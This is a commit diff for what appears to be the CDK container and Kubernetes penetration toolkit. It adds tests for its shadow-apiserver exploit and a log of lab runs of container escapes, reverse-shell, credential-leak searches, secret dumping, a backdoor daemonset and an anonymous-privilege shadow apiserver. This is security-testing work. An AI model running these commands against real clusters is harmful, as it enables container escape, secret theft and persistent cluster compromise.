update testcase for run:k8s-shadow-apiserver

pkg/exploit/k8s_shadow_apiserver.go

@@ -193,7 +193,7 @@ func deployPod(token string, serverAddr string, namespace string, data string) (
 type K8sShadowApiServerS struct{}
 
 func (p K8sShadowApiServerS) Desc() string {
-	return "duplicate kube-apiserver pod, disable logs and grant all privilege to anonymous user. image to every node using daemonset, usage: cdk run k8s-shadow-apiserver (default|anonymous|<service-account-token-path>)"
+	return "duplicate kube-apiserver pod, disable logs and grant all privilege to anonymous user. usage: cdk run k8s-shadow-apiserver (default|anonymous|<service-account-token-path>)"
 }
 func (p K8sShadowApiServerS) Run() bool {
 	args := cli.Args["<args>"].([]string)

test/CDK-deploy-test/lib/conf.py

@@ -34,3 +34,5 @@ class SELFBUILD_K8S:
     TARGET_POD = 'myappnew'
     # you can keep it unchanged
     REMOTE_POD_PATH = '/cdk-fabric'
+    KUBERNETES_SERVICE_PORT = '6443'
+    KUBERNETES_SERVICE_HOST = '192.168.0.150'

test/CDK-deploy-test/lib/k8s_selfbuild_action.py

@@ -29,6 +29,7 @@ def update_remote_bin():
 
 def k8s_master_ssh_cmd(cmd_parsed, white_list, black_list, verbose=False):
     print('[TEST] [{}] {}'.format('Selfbuild k8s master node', cmd_parsed))
+
     try:
         result = conn.run(cmd_parsed, hide=bool(1 - verbose))
         for pattern in white_list:
@@ -66,7 +67,10 @@ def selfbuild_k8s_pod_upload():
 def check_selfbuild_k8s_pod_exec(cmd, white_list, black_list, verbose=False):
     # OCI runtime exec failed: exec failed: container_linux.go:344: starting container process caused "text file busy"
     time.sleep(1)
-
-    cmd_parsed = r'kubectl exec {} -- {} {}'.format(SELFBUILD_K8S.TARGET_POD, SELFBUILD_K8S.REMOTE_POD_PATH, cmd)
-    print('[TEST] [{}] {}'.format('Selfbuild K8s Pod', cmd_parsed))
+    cmd_parsed = r'kubectl exec {} -- {} {}'.format(
+        SELFBUILD_K8S.TARGET_POD,
+        SELFBUILD_K8S.REMOTE_POD_PATH,
+        cmd
+    )
+    # print('[TEST] [{}] {}'.format('Selfbuild K8s Pod', cmd_parsed))
     k8s_master_ssh_cmd(cmd_parsed, white_list, black_list, verbose)

test/CDK-deploy-test/logs/20210114112601.log

@@ -0,0 +1,68 @@
+---------- build CDK binary ----------
+---------- upload CDK to ECS, ACK, Selfbuild-K8s ----------
+[upload] CDK binary to self-build k8s master node
+[TEST] [Selfbuild k8s master node] kubectl cp /root/cdk-fabric myappnew:/cdk-fabric
+[TEST] [Selfbuild k8s master node] kubectl exec myappnew ls /cdk-fabric
+---------- upload all done ----------
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric "
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric --help"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric -v"
+[TEST] [ECS] /root/cdk-fabric evaluate --full
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm --net=host ubuntu:latest /bin/sh -c "/cdk-fabric evaluate --full"
+[TEST] [alpine:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm --net=host alpine:latest /bin/sh -c "/cdk-fabric evaluate --full"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric ifconfig"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric ps"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric ucurl"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm -v /var/run/docker.sock:/var/run/docker.sock ubuntu:latest /bin/sh -c "/cdk-fabric ucurl get /var/run/docker.sock http://127.0.0.1/info \"\""
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric probe"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric probe 1.1.1.1 22 10 1000"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric probe 1.1.1.1 22 50-999999 1000"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric vi"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric nc"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm --net=host ubuntu:latest /bin/sh -c "/cdk-fabric run --list"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm --net=host ubuntu:latest /bin/sh -c "/cdk-fabric run shim-pwn \"touch /tmp/shim-pwn-success\""
+[TEST] [ECS] rm /tmp/shim-pwn-success
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run docker-sock-check"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run docker-sock-check /var/run/docker.sock"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm -v /var/run/docker.sock:/var/run/docker.sock ubuntu:latest /bin/sh -c "/cdk-fabric run docker-sock-check /var/run/docker.sock"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run docker-sock-deploy"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run docker-sock-deploy /var/run/docker.sock alpine:latest"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm -v /var/run/docker.sock:/var/run/docker.sock ubuntu:latest /bin/sh -c "/cdk-fabric run docker-sock-deploy /var/run/docker.sock alpine:latest"
+[TEST] [ECS] docker ps | grep alpine
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run mount-cgroup"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run mount-cgroup \"touch /tmp/mount-cgroup-success\""
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm --privileged=true ubuntu:latest /bin/sh -c "/cdk-fabric run mount-cgroup \"touch /tmp/mount-cgroup-success\""
+[TEST] [ECS] rm /tmp/mount-cgroup-success
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run service-probe"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run service-probe 192.168.1.1-^^10"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run service-probe 127.0.0.1"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run mount-disk"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm --privileged=true ubuntu:latest /bin/sh -c "/cdk-fabric run mount-disk"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run mount-procfs"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm -v /proc:/host_proc ubuntu:latest /bin/sh -c "/cdk-fabric run mount-procfs /host_proc \"touch /tmp/mount-procfs-success\""
+[TEST] [ECS] rm /tmp/mount-procfs-success
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run reverse-shell"
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm  ubuntu:latest /bin/sh -c "/cdk-fabric run ak-leakage"
+[TEST] [ECS] echo "AKIA99999999999999AB" > /tmp/ak-leakage
+[TEST] [ubuntu:latest] docker run -v /root/cdk-fabric:/cdk-fabric --rm -v /tmp/ak-leakage:/tmp/ak-leakage ubuntu:latest /bin/sh -c "/cdk-fabric run ak-leakage /tmp"
+[TEST] [ECS] rm /tmp/ak-leakage
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric evaluate
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric evaluate
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric run k8s-configmap-dump
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric run k8s-configmap-dump auto
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric run k8s-configmap-dump /tmp/jkdhahdjfka2
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric run k8s-secret-dump
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric run k8s-secret-dump auto
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric kcurl
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric kcurl default get https://172.21.0.1:443/api/v1/nodes
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric kcurl anonymous get https://172.21.0.1:443/api/v1/nodes
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric         kcurl anonymous post 'https://172.21.0.1:443/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply' '{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"cdxy-test-2021\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"ubuntu:latest\",\"name\":\"container\"}]}}\n"},"name":"cdxy-test-2021","namespace":"default"},"spec":{"containers":[{"image":"ubuntu:latest","name":"container"}]}}'        
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric run k8s-backdoor-daemonset 1
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric run k8s-backdoor-daemonset anonymous ubuntu
+[TEST] [K8s Pod] kubectl exec myappnew -- /cdk-fabric run istio-check
+[TEST] [Selfbuild k8s master node] kubectl exec myappnew -- /cdk-fabric evaluate
+[TEST] [Selfbuild k8s master node] kubectl delete pod kube-apiserver-cn-beijing.192.168.0.150-shadow -n kube-system
+[TEST] [Selfbuild k8s master node] kubectl exec myappnew -- /cdk-fabric run k8s-shadow-apiserver default
+[TEST] [Selfbuild k8s master node] kubectl exec myappnew -- /cdk-fabric run k8s-shadow-apiserver anonymous
+[TEST] [Selfbuild k8s master node] kubectl exec myappnew -- curl 192.168.0.150:9443
+[TEST] [ECS] docker stop $(docker ps -q) & docker rm $(docker ps -aq)

test/CDK-deploy-test/test_main.py

@@ -6,7 +6,7 @@
 from lib.ssh_remote_action import inside_container_cmd
 from lib.ssh_remote_action import check_host_exec
 from lib.k8s_remote_action import check_pod_exec, k8s_pod_upload
-from lib.k8s_selfbuild_action import selfbuild_k8s_pod_upload, check_selfbuild_k8s_pod_exec
+from lib.k8s_selfbuild_action import selfbuild_k8s_pod_upload, check_selfbuild_k8s_pod_exec, k8s_master_ssh_cmd
 from lib.conf import CDK
 
 
@@ -525,18 +525,39 @@ def test_all():
         False
     )
 
-
-def test_dev():
-    time.sleep(0.5)
-    #
-    check_selfbuild_k8s_pod_exec(
-        'run k8s-shadow-apiserver default',
+    # run: k8s-shadow-apiserver
+    k8s_master_ssh_cmd(
+        'kubectl delete pod kube-apiserver-cn-beijing.192.168.0.150-shadow -n kube-system',
+        [],
         [],
+        False
+    )
+    check_selfbuild_k8s_pod_exec(
+        'run k8s-shadow-apiserver default',  # success
+        ['listening insecure-port: 0.0.0.0:9443'],
         ['panic:', 'nodes is forbidden', 'cdk evaluate', 'empty'],
-        True
+        False
+    )
+    check_selfbuild_k8s_pod_exec(
+        'run k8s-shadow-apiserver anonymous',  # forbidden
+        ['forbidden this request'],
+        ['listening insecure-port: 0.0.0.0:9443', 'panic:', 'nodes is forbidden', 'cdk evaluate', 'empty'],
+        False
+    )
+    k8s_master_ssh_cmd(
+        'kubectl exec myappnew -- curl 192.168.0.150:9443',  # curl shadow-apiserver
+        ['/api/v1'],
+        [],
+        False
     )
 
 
+def test_dev():
+    time.sleep(0.5)
+
+
+
+
 def clear_all_container():
     check_host_exec(r'docker stop $(docker ps -q) & docker rm $(docker ps -aq)', [], [], False)
 
@@ -554,7 +575,6 @@ def clear_all_container():
     print('-' * 10, 'upload all done', '-' * 10)
 
     # test
-    test_dev()
-
-    # test_all()
-    # clear_all_container()
+    # test_dev()
+    test_all()
+    clear_all_container()

test/k8s_exploit_util/myappnew.yaml

@@ -6,6 +6,11 @@ spec:
   containers:
   - image: nginx
     name: container
+    env:
+      - name: KUBERNETES_SERVICE_HOST
+        value: "192.168.0.150"
+      - name: KUBERNETES_SERVICE_PORT
+        value: "6443"
     volumeMounts:
     - mountPath: /mnt
       name: test-volume